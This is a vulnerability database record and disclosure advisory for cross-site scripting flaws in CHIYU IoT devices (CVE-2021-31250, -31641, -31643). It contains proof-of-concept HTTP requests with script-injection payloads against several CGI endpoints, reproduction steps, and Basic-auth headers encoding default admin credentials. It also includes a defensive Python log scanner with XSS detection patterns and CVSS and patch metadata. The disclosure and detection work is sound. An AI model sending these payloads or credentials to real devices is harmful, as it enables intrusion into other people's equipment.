VAR-202106-1313
Vulnerability from VARIoT
An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter. An attacker can use this vulnerability to execute client code.

# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.

#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
CVE ID: CVE-2021-31250
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250

============= PoC 01 ===============
Affected parameter: TF_submask
Component: if.cgi
Payload: "><script>alert(123)</script>

HTTP Request:
GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

Steps to reproduce:
 1. Navigate to the vulnerable device
 2. Make a GET request to component mentioned (if.cgi)
 3. Append the payload at the end of the vulnerable parameter (TF_submask)
 4. Submit the request and observe payload execution

============= PoC 02 ===============
Affected parameter: TF_hostname=
Component: dhcpc.cgi
Payload: /"><img src="#">

HTTP Request:
GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

Steps to reproduce:
 1. Navigate to the vulnerable device
 2. Make a GET request to component mentioned (dhcpc.cgi)
 3. Append the payload at the end of the vulnerable parameter (TF_hostname)
 4. Submit the request and observe payload execution

============= PoC 03 ===============
Affected parameter: TF_servicename=
Component: ppp.cgi
Payload: "><script>alert(123)</script>

HTTP Request:
GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

Steps to reproduce:
 1. Navigate to the vulnerable device
 2. Make a GET request to component mentioned (ppp.cgi)
 3. Append the payload at the end of the vulnerable parameter (TF_servicename)
 4. Submit the request and observe payload execution

============= PoC 04 ===============
Affected parameter: TF_port=
Component: man.cgi
Payload: /"><img src="#">

HTTP Request:
GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

Steps to reproduce:
 1. Navigate to the vulnerable device
 2. Make a GET request to component mentioned (man.cgi)
 3. Append the payload at the end of the vulnerable parameter (TF_port)
 4. Submit the request and observe payload execution

#2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641
Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641

Component: any argument passed via URL that results in an HTTP-404
Payload: http://ip/<script>alert(123)</script>

Steps to reproduce:
 1. Navigate to the webpage of the vulnerable device
 2. In the web browser, append the payload after the IP address (see payload above)
 3. Submit the request and observe payload execution

#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643
Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643

Affected parameter: username=
Component: if.cgi
Payload: "><script>alert(1)</script>

HTTP request - SEMAC Web Ver7.2

GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1

HTTP request - BIOSENSE-III-COMBO(M1)(20000)

GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1

Steps to reproduce:
 1. Navigate to the vulnerable device
 2. Make a GET request to component mentioned (if.cgi)
 3. Append the payload at the end of the vulnerable parameter (username)
 4. Submit the request and observe payload execution
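As an added defender-side example (not part of the advisory or of the VARIoT record), the following Python scans web access-log lines from a CHIYU device for the CGI endpoints and parameters the advisory names, flags HTML markup in parameter values or in the request path (the 404 reflection case), and keeps every occurrence of a duplicated parameter, since PoC 01 and PoC 04 send the vulnerable parameter twice. The endpoint-to-parameter table, the Common Log Format layout and the sample log lines are assumptions constructed for this example.

```python
"""Flag XSS payloads in access-log requests to the CHIYU CGI endpoints named in the advisory."""
import re
from urllib.parse import parse_qsl, unquote, unquote_plus

# Endpoint -> parameters the advisory names as vulnerable (CVE-2021-31250, CVE-2021-31643).
# Assumed mapping built from the advisory text; extend it if more parameters are confirmed.
WATCHED_PARAMS = {
    "/if.cgi": {"TF_submask", "username"},
    "/dhcpc.cgi": {"TF_hostname"},
    "/ppp.cgi": {"TF_servicename"},
    "/man.cgi": {"TF_port"},
}

# Markup that never belongs in a netmask, hostname, service name, port or user name.
# A bare opening tag is enough: PoC 02 sends '<img src="#"' with no closing '>'.
# The on...= pattern catches event-handler injection into an existing attribute.
MARKUP = re.compile(r"<\s*/?[a-z][a-z0-9]*\b|javascript:|\bon[a-z]+\s*=", re.I)

# Common Log Format (assumed); only the fields the detection needs are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decodings(value):
    """Return the value plus one extra URL-decoding pass, so double-encoded payloads are not missed."""
    again = unquote_plus(value)
    return (value, again) if again != value else (value,)


def scan_target(path, query):
    """Return (param, decoded_value, severity) findings for one request path and query string."""
    findings = []
    # parse_qsl keeps every occurrence and URL-decodes once, so a duplicated parameter
    # (PoC 01 sends TF_submask twice, PoC 04 sends TF_port twice) is not collapsed to its first value.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if any(MARKUP.search(v) for v in decodings(value)):
            severity = "high" if name in WATCHED_PARAMS.get(path, ()) else "medium"
            findings.append((name, value, severity))
    # CVE-2021-31641: markup in the path is reflected on the device's 404 page for any URL.
    decoded_path = unquote(path)
    if any(MARKUP.search(v) for v in decodings(decoded_path)):
        findings.append(("<path>", decoded_path, "high"))
    return findings


def scan_log(lines):
    """Scan access-log lines; returns a list of finding dicts in log order."""
    results = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line this parser understands; leave it alone
        path, _, query = m.group("target").partition("?")
        for name, value, severity in scan_target(path, query):
            results.append({"ip": m.group("ip"), "path": path, "status": m.group("status"),
                            "param": name, "value": value, "severity": severity})
    return results


# Constructed sample log lines (not from the advisory or any real device); the query
# strings reuse the parameter names and encodings shown in the advisory's PoCs.
SAMPLE_LOG = [
    '192.168.187.50 - admin [31/May/2021:10:00:01 +0000] "GET /if.cgi?redirect=setting.htm'
    '&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29'
    '%3C%2Fscript%3E&B_apply=APPLY HTTP/1.1" 302 0',
    '192.168.187.50 - admin [31/May/2021:10:00:02 +0000] "GET /dhcpc.cgi?type=dhcpc_apply'
    '&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&TF_port=443'
    '&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1" 302 0',
    '192.168.187.51 - - [31/May/2021:10:00:03 +0000] "GET /%3Cscript%3Ealert%28123%29'
    '%3C%2Fscript%3E HTTP/1.1" 404 0',
    '192.168.187.50 - admin [31/May/2021:10:00:04 +0000] "GET /if.cgi?type=ap_tcps_apply'
    '&TF_ip=443&TF_submask=255.255.255.0&B_apply=APPLY HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']} {f['path']} {f['param']}={f['value']!r}")
```

Because the device accepts these requests with Basic authentication, a "high" hit from an authenticated source is most likely a stored payload already written to the configuration, so the affected field should be inspected on the device rather than only blocked at the edge.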
VARIoT record VAR-202106-1313 (structured data from the source database, reproduced here in readable form)

- CVE: CVE-2021-31643
- Type: xss (PACKETSTORM, CNNVD); threat type: remote (CNNVD); problem type: CWE-79 Cross-site scripting (NVD, JVNDB)
- Title (JVNDB): Cross-site scripting vulnerabilities in multiple CHIYU Technology IoT devices
- Credits: sirpedrotavares (PACKETSTORM 162887)
- IoT device record: yes (VARIoT devices database)
- Affected products (vendor chiyu tech, no version given): biosense, bf-630, bf-631, webpass, semac d1, semac d2, semac d2 n300, semac d4, semac s1 osdp, semac s2, semac s3v3. Sources: NVD CVE-2021-31643 (all of the above), JVNDB-2021-007491 (all except biosense)
- CVSS v2 (nvd@nist.gov): AV:N/AC:M/Au:S/C:N/I:P/A:N, base score 3.5 (LOW), exploitability 6.8, impact 2.9
- CVSS v3.1 (nvd@nist.gov): CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, base score 5.4 (MEDIUM), exploitability 2.3, impact 2.7
- CVSS v3.0 (NVD, via JVNDB): CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, base score 5.4 (Medium)
- Severity: MEDIUM (nvd@nist.gov), Medium (NVD via JVNDB), MEDIUM (CNNVD-202106-019). Note that the NVD vector (UI:R, I:L) differs from the one given in the advisory text above for CVE-2021-31643 (UI:N, I:N).
- External IDs: NVD CVE-2021-31643; PACKETSTORM 162887; JVNDB-2021-007491; CNNVD-202106-019
- Patch: "Firmware update", https://www.chiyu-tech.com/msg/message-Firmware-update-87.html (JVNDB); "BF-630W Fixes for cross-site scripting vulnerabilities", http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=153502 (CNNVD)
- References:
  - http://packetstormsecurity.com/files/162887/chiyu-iot-cross-site-scripting.html
  - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
  - https://www.chiyu-tech.com/msg/message-firmware-update-87.html
  - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
  - https://nvd.nist.gov/vuln/detail/cve-2021-31643
  - https://nvd.nist.gov/vuln/detail/cve-2021-31250
  - https://nvd.nist.gov/vuln/detail/cve-2021-31641
  (the remaining entries in the record are the vendor, gitbook and lab-host URLs quoted in the advisory above)
- Release dates: PACKETSTORM 2021-06-01T15:08:26; CNNVD 2021-06-01; NVD 2021-06-01T15:15:07.747; JVNDB 2022-02-14
- Update dates: NVD 2021-06-08T20:33:15.690; CNNVD 2021-08-16; JVNDB 2022-02-14T09:15:00
- Record last updated: 2024-08-14T13:23:31.209Z
Sightings
Author | Source | Type | Date
(no sightings recorded)
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.